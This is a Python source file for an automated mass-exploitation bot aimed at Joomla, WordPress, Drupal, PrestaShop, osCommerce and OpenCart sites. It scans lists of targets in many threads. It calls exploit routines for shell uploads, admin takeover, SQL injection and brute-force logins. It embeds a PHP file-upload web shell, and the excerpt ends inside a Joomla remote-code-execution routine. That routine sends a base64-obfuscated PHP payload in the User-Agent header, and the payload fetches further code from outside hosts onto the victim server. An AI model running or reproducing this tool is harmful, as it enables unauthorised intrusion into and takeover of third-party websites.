drupagedon2

1. import os, re, sys, socket, binascii, time, json, random, threading
2. from Queue import Queue
3.  
4. try:
5. import requests
6. except ImportError:
7. print '---------------------------------------------------'
8. print '[*] pip install requests'
9. print ' [-] you need to install requests Module'
10. sys.exit()
11.  
12. class AutoExploiter(object):
13. def __init__(self):
14. try:
15. os.mkdir('result')
16. except:
17. pass
18. try:
19. os.mkdir('logs')
20. except:
21. pass
22. self.r = '\033[31m'
23. self.g = '\033[32m'
24. self.y = '\033[33m'
25. self.b = '\033[34m'
26. self.m = '\033[35m'
27. self.c = '\033[36m'
28. self.w = '\033[37m'
29. self.rr = '\033[39m'
30. self.shell_code = '''
31. <title>wordpress_project</title>
32. <?php
33. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
34. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
35. if( $_POST['_upl'] == "Upload" ) {
36. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
37. else { echo '<b>Not uploaded ! </b><br><br>'; }
38. }
39. ?>
40. '''
41. self.version = '1.3.9'
42. self.year = time.strftime("%y")
43. self.month = time.strftime("%m")
44. self.EMail = 'email@email.com' # --> add your email for Add admin, Password Will send to this EMail!
45. self.Jce_Deface_image = 'files/pwn.gif'
46. self._shell = 'files/shell.jpg'
47. self.indeX = 'files/index.jpg'
48. self.TextindeX = 'files/vuln.txt'
49. self.MailPoetZipShell = 'files/rock.zip'
50. self.ZipJd = 'files/jdownlods.zip'
51. self.pagelinesExploitShell = 'files/settings_auto.php'
52. self.jdShell = 'files/vuln.php3.j'
53. self.ShellPresta = 'files/up.php'
54. self.gravShell = 'files/grav.jpg'
55.  
56. try:
57. self.select = sys.argv[1]
58. except:
59. self.cls()
60. self.print_logo()
61. self.Print_options()
62. sys.exit()
63. if self.select == str('1'): # Single
64. self.cls()
65. self.print_logo()
66. self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
67. if self.Url.startswith("http://"):
68. self.Url = self.Url.replace("http://", "")
69. elif self.Url.startswith("https://"):
70. self.Url = self.Url.replace("https://", "")
71. else:
72. pass
73. try:
74. CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif')
75. CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php')
76. CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
77. Checktwo = requests.get('http://' + self.Url, timeout=5)
78. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
79. self.Print_Scanning(self.Url, 'joomla')
80. self.RCE_Joomla(self.Url)
81. self.Joomla_TakeADmin(self.Url)
82. self.Com_AdsManager_Shell(self.Url)
83. self.alberghiExploit(self.Url)
84. self.Com_CCkJseblod(self.Url)
85. self.Com_Fabric(self.Url)
86. self.Com_Hdflvplayer(self.Url)
87. self.Com_Jdownloads_shell(self.Url)
88. self.Com_Joomanager(self.Url)
89. self.Com_MyBlog(self.Url)
90. self.Com_Macgallery(self.Url)
91. self.JCE_shell(self.Url)
92. self.Com_s5_media_player(self.Url)
93. self.JooMLaBruteForce(self.Url)
94. self.FckEditor(self.Url)
95. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
96. self.Print_Scanning(self.Url, 'Wordpress')
97. self.Revslider_SHELL(self.Url)
98. self.wysijaExploit(self.Url)
99. self.WP_User_Frontend(self.Url)
100. self.Gravity_Forms_Shell(self.Url)
101. self.HD_WebPlayerSqli(self.Url)
102. self.pagelinesExploit(self.Url)
103. self.HeadWayThemeExploit(self.Url)
104. self.addblockblocker(self.Url)
105. self.cherry_plugin(self.Url)
106. self.formcraftExploit_Shell(self.Url)
107. self.UserProExploit(self.Url)
108. self.wp_mobile_detector(self.Url)
109. self.Wp_Job_Manager(self.Url)
110. self.wp_content_injection(self.Url)
111. self.Woocomrece(self.Url)
112. self.viral_optins(self.Url)
113. self.CateGory_page_icons(self.Url)
114. self.Downloads_Manager(self.Url)
115. self.FckEditor(self.Url)
116. elif '/sites/default/' in Checktwo.text.encode('utf-8')\
117. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
118. self.Print_Scanning(self.Url, 'drupal')
119. self.DrupalGedden2(self.Url)
120. self.DrupalBruteForce(self.Url)
121. self.Drupal_Sqli_Addadmin(self.Url)
122.  
123. self.FckEditor(self.Url)
124. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
125. self.Print_Scanning(self.Url, 'osCommerce')
126. self.osCommerce(self.Url)
127. self.FckEditor(self.Url)
128. elif 'prestashop' in Checktwo.text.encode('utf-8'):
129. self.lib(self.Url)
130. self.psmodthemeoptionpanel(self.Url)
131. self.tdpsthemeoptionpanel(self.Url)
132. self.megamenu(self.Url)
133. self.nvn_export_orders(self.Url)
134. self.pk_flexmenu(self.Url)
135. self.wdoptionpanel(self.Url)
136. self.fieldvmegamenu(self.Url)
137. self.wg24themeadministration(self.Url)
138. self.videostab(self.Url)
139. self.cartabandonmentproOld(self.Url)
140. self.cartabandonmentpro(self.Url)
141. self.advancedslider(self.Url)
142. self.attributewizardpro_x(self.Url)
143. self.attributewizardpro3(self.Url)
144. self.attributewizardpro2(self.Url)
145. self.attributewizardpro(self.Url)
146. self.jro_homepageadvertise(self.Url)
147. self.homepageadvertise2(self.Url)
148. self.homepageadvertise(self.Url)
149. self.productpageadverts(self.Url)
150. self.simpleslideshow(self.Url)
151. self.vtermslideshow(self.Url)
152. self.soopabanners(self.Url)
153. self.soopamobile(self.Url)
154. self.columnadverts(self.Url)
155. self.FckEditor(self.Url)
156. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
157. self.OpenCart(self.Url)
158. self.FckEditor(self.Url)
159. else:
160. self.Print_Scanning(self.Url, 'Unknown')
161. self.FckEditor(self.Url)
162. except:
163. self.Timeout(self.Url)
164. sys.exit()
165. elif self.select == str('2'): # multi List
166. self.cls()
167. try:
168. self.print_logo()
169. Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
170. with open(Get_list, 'r') as zz:
171. Readlist = zz.read().splitlines()
172. except IOError:
173. print self.r + '--------------------------------------------'
174. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
175. sys.exit()
176. thread = []
177. for xx in Readlist:
178. t = threading.Thread(target=self.Work2, args=(xx, ''))
179. t.start()
180. thread.append(t)
181. time.sleep(0.0002)
182. for j in thread:
183. j.join()
184. elif self.select == str('4'):
185. try:
186. self.cls()
187. self.print_logo()
188. GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
189. if self.version in GoT.text.encode('utf-8'):
190. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
191. "Sorry But You Don't Have New Update ... Try later."
192. else:
193. Loop = True
194. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
195. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
196. while Loop:
197. Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
198. 'You Want know What is New in New Version ? [y]es or [n]o : ')
199. if Get == str('y'):
200. update_details = requests.get('https://raw.githubusercontent.com/'
201. '04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
202. print update_details.text.encode('utf-8')
203. Loop = False
204. elif Get == str('n'):
205. self.cls()
206. self.print_logo()
207. Loop = False
208. else:
209. continue
210. except:
211. self.Timeout('Github.com')
212. elif self.select == str('3'):
213. self.cls()
214. self.print_logo()
215. self.concurrent = 75
216. try:
217. self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
218. except IOError:
219. print self.r + '--------------------------------------------'
220. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
221. sys.exit()
222. self.q = Queue(self.concurrent * 2)
223. for i in range(self.concurrent):
224. self.t = threading.Thread(target=self.doWork)
225. self.t.daemon = True
226. self.t.start()
227. try:
228. for url in open(self.Get_list):
229. self.q.put(url.strip())
230. self.q.join()
231. except:
232. pass
233.  
234. else:
235. self.cls()
236. self.print_logo()
237. print self.r + '--------------------------------------------'
238. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
239.  
240. # elif self.select == str(3): # IP Server
241. # self.cls()
242. # IPserv = raw_input(' Enter IP server: ')
243. # reverse = reverse_ipz()
244. # reverse.Reverse_ip(IPserv)
245. # try:
246. # with open('logs/' + reverse.ip + '.txt', 'r') as reader:
247. # readlines = reader.read().splitlines()
248. # except:
249. # print ' i cant Find List of urls in server! use from option 2.'
250. # sys.exit()
251. # for xx in readlines:
252. # self.Url = xx
253. # if self.Url.startswith("http://"):
254. # self.Url = self.Url.replace("http://", "")
255. # elif self.Url.startswith("https://"):
256. # self.Url = self.Url.replace("https://", "")
257. # else:
258. # pass
259. # try:
260. # CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
261. # if 'version="' in CheckCMS.text.encode('utf-8'):
262. # self.Print_Scanning(self.Url, 'joomla')
263. # self.RCE_Joomla()
264. # self.Joomla_TakeADmin()
265. # self.Com_AdsManager_Shell()
266. # self.alberghiExploit()
267. # self.Com_CCkJseblod()
268. # self.Com_Fabric()
269. # self.Com_Hdflvplayer()
270. # self.Com_Jdownloads_shell()
271. # self.Com_Joomanager()
272. # self.Com_MyBlog()
273. # self.Com_Macgallery()
274. # self.JCE_shell()
275. # self.Com_s5_media_player()
276. # else:
277. # self.Print_Scanning(self.Url, 'Unknown')
278. # except requests.ConnectionError:
279. # self.Timeout(self.Url)
280. def Work2(self, url, x):
281. try:
282. if url.startswith("http://"):
283. url = url.replace("http://", "")
284. elif url.startswith("https://"):
285. url = url.replace("https://", "")
286. else:
287. pass
288. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
289. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
290. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
291. Checktwo = requests.get('http://' + url, timeout=5)
292. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
293. self.RCE_Joomla(url)
294. self.Joomla_TakeADmin(url)
295. self.Com_AdsManager_Shell(url)
296. self.alberghiExploit(url)
297. self.Com_CCkJseblod(url)
298. self.Com_Fabric(url)
299. self.Com_Hdflvplayer(url)
300. self.Com_Jdownloads_shell(url)
301. self.Com_Joomanager(url)
302. self.Com_MyBlog(url)
303. self.Com_Macgallery(url)
304. self.JCE_shell(url)
305. self.Com_s5_media_player(url)
306. self.JooMLaBruteForce(url)
307. self.FckEditor(url)
308. self.q.task_done()
309. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
310. self.Revslider_SHELL(url)
311. self.wysijaExploit(url)
312. self.WP_User_Frontend(url)
313. self.Gravity_Forms_Shell(url)
314. self.HD_WebPlayerSqli(url)
315. self.pagelinesExploit(url)
316. self.HeadWayThemeExploit(url)
317. self.addblockblocker(url)
318. self.cherry_plugin(url)
319. self.formcraftExploit_Shell(url)
320. self.UserProExploit(url)
321. self.wp_mobile_detector(url)
322. self.Wp_Job_Manager(url)
323. self.wp_content_injection(url)
324. self.viral_optins(url)
325. self.Woocomrece(url)
326. self.CateGory_page_icons(url)
327. self.Downloads_Manager(url)
328. self.FckEditor(url)
329. self.q.task_done()
330. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
331. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
332. self.Drupal_Sqli_Addadmin(url)
333. self.DrupalGedden2(url)
334. self.DrupalBruteForce(url)
335. self.FckEditor(url)
336. self.q.task_done()
337. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
338. self.osCommerce(url)
339. self.FckEditor(url)
340. self.q.task_done()
341. elif 'prestashop' in Checktwo.text.encode('utf-8'):
342. self.lib(url)
343. self.psmodthemeoptionpanel(url)
344. self.tdpsthemeoptionpanel(url)
345. self.megamenu(url)
346. self.nvn_export_orders(url)
347. self.pk_flexmenu(url)
348. self.wdoptionpanel(url)
349. self.fieldvmegamenu(url)
350. self.wg24themeadministration(url)
351. self.videostab(url)
352. self.cartabandonmentproOld(url)
353. self.cartabandonmentpro(url)
354. self.advancedslider(url)
355. self.attributewizardpro_x(url)
356. self.attributewizardpro3(url)
357. self.attributewizardpro2(url)
358. self.attributewizardpro(url)
359. self.jro_homepageadvertise(url)
360. self.homepageadvertise2(url)
361. self.homepageadvertise(url)
362. self.productpageadverts(url)
363. self.simpleslideshow(url)
364. self.vtermslideshow(url)
365. self.soopabanners(url)
366. self.soopamobile(url)
367. self.columnadverts(url)
368. self.FckEditor(url)
369. self.q.task_done()
370. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
371. self.OpenCart(self.Url)
372. self.FckEditor(self.Url)
373. self.q.task_done()
374. else:
375. self.FckEditor(url)
376. self.q.task_done()
377. except:
378. pass
379. def doWork(self):
380. try:
381. while True:
382. url = self.q.get()
383. if url.startswith('http://'):
384. url = url.replace('http://', '')
385. elif url.startswith("https://"):
386. url = url.replace('https://', '')
387. else:
388. pass
389. try:
390. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
391. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
392. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
393. Checktwo = requests.get('http://' + url, timeout=5)
394. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
395. self.RCE_Joomla(url)
396. self.Joomla_TakeADmin(url)
397. self.Com_AdsManager_Shell(url)
398. self.alberghiExploit(url)
399. self.Com_CCkJseblod(url)
400. self.Com_Fabric(url)
401. self.Com_Hdflvplayer(url)
402. self.Com_Jdownloads_shell(url)
403. self.Com_Joomanager(url)
404. self.Com_MyBlog(url)
405. self.Com_Macgallery(url)
406. self.JCE_shell(url)
407. self.Com_s5_media_player(url)
408. self.JooMLaBruteForce(url)
409. self.FckEditor(url)
410. self.q.task_done()
411. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
412. self.Revslider_SHELL(url)
413. self.wysijaExploit(url)
414. self.WP_User_Frontend(url)
415. self.Gravity_Forms_Shell(url)
416. self.HD_WebPlayerSqli(url)
417. self.pagelinesExploit(url)
418. self.HeadWayThemeExploit(url)
419. self.addblockblocker(url)
420. self.cherry_plugin(url)
421. self.formcraftExploit_Shell(url)
422. self.UserProExploit(url)
423. self.wp_mobile_detector(url)
424. self.Wp_Job_Manager(url)
425. self.wp_content_injection(url)
426. self.viral_optins(url)
427. self.Woocomrece(url)
428. self.CateGory_page_icons(url)
429. self.Downloads_Manager(url)
430. self.FckEditor(url)
431. self.q.task_done()
432. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
433. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
434. self.Drupal_Sqli_Addadmin(url)
435. self.DrupalGedden2(url)
436. self.DrupalBruteForce(url)
437. self.FckEditor(url)
438. self.q.task_done()
439. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
440. self.osCommerce(url)
441. self.FckEditor(url)
442. self.q.task_done()
443. elif 'prestashop' in Checktwo.text.encode('utf-8'):
444. self.lib(url)
445. self.psmodthemeoptionpanel(url)
446. self.tdpsthemeoptionpanel(url)
447. self.megamenu(url)
448. self.nvn_export_orders(url)
449. self.pk_flexmenu(url)
450. self.wdoptionpanel(url)
451. self.fieldvmegamenu(url)
452. self.wg24themeadministration(url)
453. self.videostab(url)
454. self.cartabandonmentproOld(url)
455. self.cartabandonmentpro(url)
456. self.advancedslider(url)
457. self.attributewizardpro_x(url)
458. self.attributewizardpro3(url)
459. self.attributewizardpro2(url)
460. self.attributewizardpro(url)
461. self.jro_homepageadvertise(url)
462. self.homepageadvertise2(url)
463. self.homepageadvertise(url)
464. self.productpageadverts(url)
465. self.simpleslideshow(url)
466. self.vtermslideshow(url)
467. self.soopabanners(url)
468. self.soopamobile(url)
469. self.columnadverts(url)
470. self.FckEditor(url)
471. self.q.task_done()
472. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
473. self.OpenCart(self.Url)
474. self.FckEditor(self.Url)
475. self.q.task_done()
476. else:
477. self.FckEditor(url)
478. self.q.task_done()
479. except:
480. pass
481. except:
482. pass
483.  
484.  
485.  
486. def print_logo(self):
487. clear = "\x1b[0m"
488. colors = [36, 32, 34, 35, 31, 37]
489.  
490. x = """
491.  
492.  
493. White HaT Hackers
494. _ ______ _ _ _
495. /\ | | | ____| | | (_) |
496. / \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
497. / /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
498. / ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
499. /_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
500. | |
501. IRan-Cyber.Net |_| gitHub.com/04x
502.  
503. Note! : We don't Accept any responsibility for any illegal usage.
504. """
505. for N, line in enumerate(x.split("\n")):
506. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
507. time.sleep(0.05)
508.  
509. def Print_options(self):
510. print self.r + ' [' + self.y + '1' + self.r + '] ' + self.c + 'Single Target' + self.w +\
511. ' [ ' + 'python AutoExploit.py 1' + ' ]'
512. print self.r + ' [' + self.y + '2' + self.r + '] ' + self.c + 'List Scan' + self.w + ' [ ' + 'python AutoExploit.py 2' + ' ]'
513. print self.r + ' [' + self.y + '3' + self.r + '] ' + self.c + 'Thread List Scan' + self.w + ' [ ' + 'python AutoExploit.py 3' + ' ]'
514. print self.r + ' [' + self.y + '4' + self.r + '] ' + self.c + 'Check Update' + self.w + ' [ ' + 'python AutoExploit.py 4' + ' ]'
515.  
516.  
517.  
518. def Print_Scanning(self, url, CMS):
519. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.w + ' [ ' + CMS + ' ]'
520.  
521.  
522. def Timeout(self, url):
523. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.r + ' [ TimeOut!!/NotValid Url ]'
524.  
525. def Print_NotVuln(self, NameVuln, site):
526. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
527.  
528. def Print_Username_Password(self, username, Password):
529. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Username: ' + self.g + username
530. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Password: ' + self.g + Password
531.  
532.  
533. def Print_Vuln(self, NameVuln, site):
534. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.g + ' [Vuln!!]'
535.  
536. def Print_Vuln_index(self, indexPath):
537. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
538.  
539. def Print_vuln_Shell(self, shellPath):
540. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
541.  
542. def Print_vuln_Config(self, pathconfig):
543. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + pathconfig + self.g + ' [Config Downloaded!]'
544.  
545.  
546. def cls(self):
547. linux = 'clear'
548. windows = 'cls'
549. os.system([linux, windows][os.name == 'nt'])
550.  
551. def RCE_Joomla(self, site):
552. try:
553. pl = self.generate_payload(
554. "base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=')")
555. headers = {
556. 'User-Agent': pl
557. }
558. try:
559. cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
560. except:
561. pass
562. try:
